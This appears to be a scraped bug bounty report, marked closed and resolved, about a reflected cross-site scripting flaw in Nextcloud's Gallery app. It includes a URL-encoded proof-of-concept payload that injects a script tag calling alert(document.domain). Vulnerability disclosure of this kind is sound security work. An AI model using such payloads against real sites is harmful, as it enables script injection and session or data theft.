Loading HuntDB...

Reflected XSS in Gallery App

Medium
N
Nextcloud
Submitted None
Reported by soreks

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Go to: `nextcloud/index.php/apps/gallery/#%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3Eblocked:alert%280%29//%00` Tested on: Firefox 43.0.1 If you need more information then write me.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic